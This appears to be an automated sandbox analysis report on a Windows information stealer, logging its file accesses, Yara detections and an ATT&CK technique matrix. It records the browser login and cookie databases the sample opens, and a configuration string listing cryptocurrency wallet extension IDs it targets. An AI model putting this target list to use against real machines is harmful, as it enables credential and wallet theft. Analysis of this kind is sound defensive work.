                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle | 0_2_00E4DF1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3B146 GetVersionExW | 0_2_00E3B146
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                  Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7264, type: MEMORYSTR
Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
Source: Yara match | File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
Source: Yara match | File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                  Remote Access Functionality

Source: Yara match | File source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7876, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7264, type: MEMORYSTR
Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
Source: Yara match | File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
Source: Yara match | File source: file.exe, type: SAMPLE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
Source: Yara match | File source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 12 Process Injection | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 147 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Software Packing | NTDS | 241 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Masquerading | Cached Domain Credentials | 141 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
